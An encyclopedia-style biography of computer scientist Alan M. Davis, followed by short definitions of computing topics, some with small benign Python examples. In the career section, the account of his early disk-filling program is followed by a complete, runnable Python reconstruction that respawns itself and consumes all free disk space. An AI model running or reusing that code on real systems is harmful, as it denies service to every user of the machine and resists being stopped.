Alan M. Davis

Alan Mark Davis is president and CEO of Offtoa, Inc. in Westminster, Colorado. He is a retired Professor of Business Strategy and Entrepreneurship in the College of Business at the University of Colorado at Colorado Springs and in the Executive MBA program at the University of Colorado at Denver.

Career

Davis earned his master's degree in computer science under Donald B. Gillies at the University of Illinois at Urbana-Champaign (UIUC) in 1973 and his Ph.D. in computer science under Thomas R. Wilcox there in 1975. At UIUC, Davis was notable for creating an early malware program: a process on a PDP-11 that (a) checked whether an identical copy of itself was currently running as an active process and, if not, created a copy of itself and started it running; (b) checked whether any disk space (which all users shared) was available and, if so, created a file the size of that space; and (c) looped back to step (a). As a result, the process consumed all available disk space. When users tried to save files, the operating system advised them that the disk was full and that they needed to delete some existing files; if they did delete a file, the process immediately snatched up the freed space. When users called in a system administrator (A. Ian Stocks) to fix the problem, he examined the active processes, discovered the offending process, and deleted it, but before he left the room the surviving copy created another, and the problem persisted. The only way to make the computer usable again was to reboot.[1]
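
The loop is simple enough to sketch. Below is a minimal reconstruction in Python of the behavior described above; the original was a PDP-11 process, so every detail here (the directory name, the pgrep-based self-check, the respawn-by-re-executing-the-script trick) is an assumption for illustration, not Davis's code.

```python
# Minimal sketch of the disk-hogging loop described above (illustrative only).
import os
import shutil
import subprocess
import sys
import time

HOG_DIR = "/tmp/hog"  # assumed location for the space-grabbing files

def another_copy_running() -> bool:
    """Step (a): check whether an identical copy is already active."""
    out = subprocess.run(["pgrep", "-f", os.path.basename(sys.argv[0])],
                         capture_output=True, text=True)
    return any(pid != str(os.getpid()) for pid in out.stdout.split())

def grab_free_space(n: int) -> None:
    """Step (b): if any shared disk space is free, claim it with one file."""
    free = shutil.disk_usage(HOG_DIR).free
    if free == 0:
        return
    try:
        with open(os.path.join(HOG_DIR, f"grab{n}.dat"), "wb") as f:
            while free > 0:
                block = min(free, 1 << 20)
                f.write(b"\0" * block)  # write real bytes, not a sparse file
                free -= block
    except OSError:
        pass  # the disk filled up mid-write, which is the point

def main() -> None:
    os.makedirs(HOG_DIR, exist_ok=True)
    n = 0
    while True:  # step (c): loop back to step (a)
        if not another_copy_running():
            subprocess.Popen([sys.executable, sys.argv[0]])  # respawn a twin
        grab_free_space(n)
        n += 1
        time.sleep(1)

if __name__ == "__main__":
    main()
```

Killing one copy leaves its twin to respawn it, which is why, as the account above notes, only a reboot cleared the machine.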

Davis held academic positions at George Mason University and the University of Tennessee, and was a visiting faculty member at UIUC, the University of the Western Cape (South Africa), the University of Technology, Sydney (Australia), and the Technical University of Madrid (Spain). He was a Fulbright Specialist at the University of Jos (Nigeria) and at Atma Jaya University, Yogyakarta (Indonesia), and a Fulbright Senior Specialist from 2003 through 2007. In industry, he was Director of R&D at GTE Communication Systems in Phoenix, Arizona; Director of the Software Technology Center at GTE Laboratories in Waltham, Massachusetts; Vice President at BTG in Vienna, Virginia; and President of Omni-Vista in Colorado Springs, Colorado. He was Editor-in-Chief of IEEE Software from 1994 to 1998, an editor for the Journal of Systems and Software (1987–2010) and Communications of the ACM (1981–1991), and a member of the editorial board of the Requirements Engineering Journal (2005–2011). He has been an IEEE Fellow since 1994 and an IEEE Life Fellow since 2015.

Books

Davis has written a number of books. In 2006, his 201 Principles of Software Development was voted by ACM members as one of the 20 classic computer science books.

Related Research Articles

Computer programming or coding is the composition of sequences of instructions, called programs, that computers can follow to perform tasks. It involves designing and implementing algorithms, step-by-step specifications of procedures, by writing code in one or more programming languages. Programmers typically use high-level programming languages that are more easily intelligible to humans than machine code, which is directly executed by the central processing unit. Proficient programming usually requires expertise in several different subjects, including knowledge of the application domain, details of programming languages and generic code libraries, specialized algorithms, and formal logic.

An operating system (OS) is system software that manages computer hardware and software resources, and provides common services for computer programs.

Software engineering is an engineering approach to software development. A practitioner, known as a software engineer, applies the engineering design process to develop software.

Software testing is the act of checking whether software satisfies expectations.

A disk image is a snapshot of a storage device's structure and data, typically stored in one or more computer files on another storage device.

Peter Gabriel Neumann is a computer-science researcher who worked on the Multics operating system in the 1960s. He edits the RISKS Digest columns for ACM Software Engineering Notes and Communications of the ACM. He founded ACM SIGSOFT and is a Fellow of the ACM, IEEE, and AAAS.

In engineering, a requirement is a condition that must be satisfied for the output of a work effort to be acceptable. It is an explicit, objective, clear and often quantitative description of a condition to be satisfied by a material, design, product, or service.

Grady Booch is an American software engineer, best known for developing the Unified Modeling Language (UML) with Ivar Jacobson and James Rumbaugh. He is recognized internationally for his innovative work in software architecture, software engineering, and collaborative development environments.

In a computer operating system that uses paging for virtual memory management, page replacement algorithms decide which memory pages to page out, sometimes called swap out, or write to disk, when a page of memory needs to be allocated. Page replacement happens when a requested page is not in memory and a free page cannot be used to satisfy the allocation, either because there are none, or because the number of free pages is lower than some threshold.
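
To make the mechanism concrete, here is a small simulation of one classic replacement policy, FIFO; the reference string and frame count are arbitrary examples, and real kernels use more sophisticated policies such as LRU approximations.

```python
# FIFO page replacement: on a miss with all frames full, evict the page that
# has been resident the longest.
from collections import deque

def fifo_faults(reference_string, num_frames):
    """Count page faults for a reference string under FIFO replacement."""
    frames = deque()  # resident pages, oldest on the left
    faults = 0
    for page in reference_string:
        if page in frames:
            continue          # hit: the page is already resident
        faults += 1           # miss: the page must be brought in
        if len(frames) == num_frames:
            frames.popleft()  # no free frame: evict the oldest page
        frames.append(page)
    return faults

print(fifo_faults([1, 2, 3, 4, 1, 2, 5, 1, 2, 3, 4, 5], 3))  # -> 9 faults
```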

In computing, a file system or filesystem governs file organization and access. A local file system is a capability of an operating system that services the applications running on the same computer. A distributed file system is a protocol that provides file access between networked computers.

Data corruption refers to errors in computer data that occur during writing, reading, storage, transmission, or processing, which introduce unintended changes to the original data. Computer, transmission, and storage systems use a number of measures to provide end-to-end data integrity, i.e., freedom from such errors.
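
One common integrity measure is to carry a checksum alongside the data and verify it on read. The sketch below uses SHA-256 purely as a stand-in for whatever checksum or error-correcting code a real system employs.

```python
# Detect corruption by recomputing a checksum recorded at write time.
import hashlib

def checksum(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

# The writer stores the checksum with the payload...
payload = b"important record"
stored = (payload, checksum(payload))

# ...and the reader recomputes it to detect changes in transit or at rest.
data, expected = stored
assert checksum(data) == expected, "data corruption detected"
```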

Data remanence is the residual representation of digital data that remains even after attempts have been made to remove or erase the data. This residue may result from data being left intact by a nominal file deletion operation, by reformatting of storage media that does not remove data previously written to the media, or through physical properties of the storage media that allow previously written data to be recovered. Data remanence may make inadvertent disclosure of sensitive information possible should the storage media be released into an uncontrolled environment.

In computing, data recovery is a process of retrieving deleted, inaccessible, lost, corrupted, damaged, or formatted data from secondary storage, removable media or files, when the data stored in them cannot be accessed in a usual way. The data is most often salvaged from storage media such as internal or external hard disk drives (HDDs), solid-state drives (SSDs), USB flash drives, magnetic tapes, CDs, DVDs, RAID subsystems, and other electronic devices. Recovery may be required due to physical damage to the storage devices or logical damage to the file system that prevents it from being mounted by the host operating system (OS).

GPFS is high-performance clustered file system software developed by IBM. It can be deployed in shared-disk or shared-nothing distributed parallel modes, or a combination of these. It is used by many of the world's largest commercial companies, as well as some of the supercomputers on the TOP500 list. For example, it is the file system of Summit at Oak Ridge National Laboratory, which was ranked the fastest supercomputer in the world in the November 2019 TOP500 list. Summit is a 200-petaflops system composed of more than 9,000 POWER9 processors and 27,000 NVIDIA Volta GPUs. Its storage file system is called Alpine.

Anti–computer forensics or counter-forensics are techniques used to obstruct forensic analysis.

A computer virus is a type of malware that, when executed, replicates itself by modifying other computer programs and inserting its own code into those programs. If this replication succeeds, the affected areas are then said to be "infected" with a computer virus, a metaphor derived from biological viruses.

The kernel is a computer program at the core of a computer's operating system and generally has complete control over everything in the system. The kernel is also responsible for preventing and mitigating conflicts between different processes. It is the portion of the operating system code that is always resident in memory and facilitates interactions between hardware and software components. A full kernel controls all hardware resources via device drivers, arbitrates conflicts between processes concerning such resources, and optimizes the utilization of common resources such as CPU and cache usage, file systems, and network sockets. On most systems, the kernel is one of the first programs loaded on startup. It handles the rest of startup as well as memory, peripherals, and input/output (I/O) requests from software, translating them into data-processing instructions for the central processing unit.

In engineering, debugging is the process of finding the root cause of a bug and identifying workarounds and possible fixes for it.

A distributed operating system is system software over a collection of independent, networked, communicating, and physically separate computational nodes. These nodes handle jobs that are serviced by multiple CPUs. Each individual node holds a specific software subset of the global aggregate operating system. Each subset is a composite of two distinct service provisioners. The first is a ubiquitous minimal kernel, or microkernel, that directly controls that node's hardware. The second is a higher-level collection of system management components that coordinate the node's individual and collaborative activities. These components abstract microkernel functions and support user applications.

A distributed file system for cloud is a file system that allows many clients to have access to data and supports operations on that data. Each data file may be partitioned into several parts called chunks. Each chunk may be stored on different remote machines, facilitating the parallel execution of applications. Typically, data is stored in files in a hierarchical tree, where the nodes represent directories. There are several ways to share files in a distributed architecture: each solution must be suitable for a certain type of application, depending on how complex the application is. Meanwhile, the security of the system must be ensured. Confidentiality, availability and integrity are the main keys for a secure system.
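
To make the chunking idea concrete, here is a toy placement function; the chunk size, server names, and round-robin policy are invented for illustration, and real systems add replication and metadata management on top.

```python
# Split a file's bytes into fixed-size chunks and assign each chunk to a
# server round-robin (a naive stand-in for a real placement policy).
def chunk_placement(file_bytes: bytes, chunk_size: int, servers: list):
    """Return (server, chunk) pairs for a naive round-robin placement."""
    chunks = [file_bytes[i:i + chunk_size]
              for i in range(0, len(file_bytes), chunk_size)]
    return [(servers[i % len(servers)], c) for i, c in enumerate(chunks)]

placement = chunk_placement(b"x" * 10, 4, ["node-a", "node-b"])
for server, chunk in placement:
    print(server, len(chunk))  # node-a 4, node-b 4, node-a 2
```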

References

  1. Davis, Alan M. (July–August 2006). "First Virus?". IEEE Software. 23 (4): 8–10. doi:10.1109/MS.2006.101.